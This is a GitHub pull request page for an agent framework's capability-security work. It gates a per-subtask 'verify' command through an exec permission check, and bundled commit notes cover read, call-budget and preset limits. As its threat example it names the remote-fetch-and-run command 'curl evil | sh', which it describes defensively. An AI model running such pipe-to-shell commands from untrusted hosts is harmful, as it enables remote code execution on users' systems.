feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754) by hartsock · Pull Request #765 · Gilamonster-Foundation/newt-agent

hartsock · 2026-06-29T15:51:11Z

OCAP enforcement-floor stack — PR 5 of 8 · epic #749

Stacked on step 4 (#760). Review/merge after #760. This completes the core complete-mediation (steps 2–5): the .meet() seam + enforcement on fs_read, max_calls, and now the team-mode verify. Full order: #749.

What this does

The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with no exec check — a malicious verify (curl evil | sh) ran ungated (T2 verify-as-payload, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it).

Test plan

denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests).

Fixes #754. Part of #749. Refs #739, #741.

🤖 Generated with Claude Code

…is (#754) OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check — a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies. TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests). Fixes #754. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

hartsock · 2026-06-29T23:23:08Z

Superseded by #781 — steps 3–6 collapsed onto current main after #751 merged + auto-closed the stack. Code is identical; review/merge there.

…lls, team-verify, clamp grammar (#749) (#781) * feat(ocap): crew.rs enforces fs_read — complete mediation for reads (#752) OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751). The crew CURATE stage read navigator-selected files unconditionally — a clamped fs_read caveat was ignored. Now the navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read caveat: ..."), so a clamped read fails visibly. TDD: refuses_to_read_outside_the_fs_read_leash — fs_read=Only([file]); the out-of-scope file is not read, the in-scope one is (red on today's code — both read; green after). just check green (52 newt-scheduler tests, +1). Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read scope is a separate algebra refinement (follow-up). This PR wires the existing predicate. Fixes #752. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): crew enforces max_calls — complete mediation for the call budget (#753) OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759). The crew loop bounded work only by cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success). The call unit is the model/role dispatch — matching newt-coder's existing call budget. max_calls is now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default) leaves unclamped crews unchanged. net: documented in-code — the crew loop has no direct net effect a permits_net check could gate; net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate (per-axis complete mediation: this axis needs a sandbox, not a call-site). TDD: max_calls_caveat_bounds_total_model_calls (red on today's code — 21 dispatches with max_calls=AtMost(3); green after — 3) + max_calls_zero_denies_even_the_navigator (red — 11; green — 0). RED verified by neutralizing the gates. just check green. Fixes #753. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754) OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check — a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies. TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests). Fixes #754. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): NamedPermissionPreset can clamp fs_read — clamp-grammar fix (#755) OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765). The M6 grammar gap: a preset could not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though CaveatProfile/Caveats can. NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec> (serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified. Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp — follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity; default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default — flipping it would break back-compat for every preset consumer). TDD: fs_read_clamp_narrows_reads (red on today — fs_read always All; green after) + back-compat (omitted fs_read => All) + config-parse. RED verified by revert. just check green. Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test fixtures); behavior-preserving (consumer literals use ..default()). Fixes #755. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Shawn Hartsock <hartsock@users.noreply.github.com> Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

hartsock added the ocap Object-capability / authority-security; pending full design review label Jun 29, 2026

hartsock closed this Jun 29, 2026

hartsock deleted the feat/ocap-5-team-verify branch June 29, 2026 23:26

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)#765

feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)#765
hartsock wants to merge 1 commit into
feat/ocap-4-crew-budgetfrom
feat/ocap-5-team-verify

hartsock commented Jun 29, 2026

Uh oh!

hartsock commented Jun 29, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Uh oh!

Conversation

hartsock commented Jun 29, 2026

OCAP enforcement-floor stack — PR 5 of 8 · epic #749

What this does

Test plan

Uh oh!

hartsock commented Jun 29, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant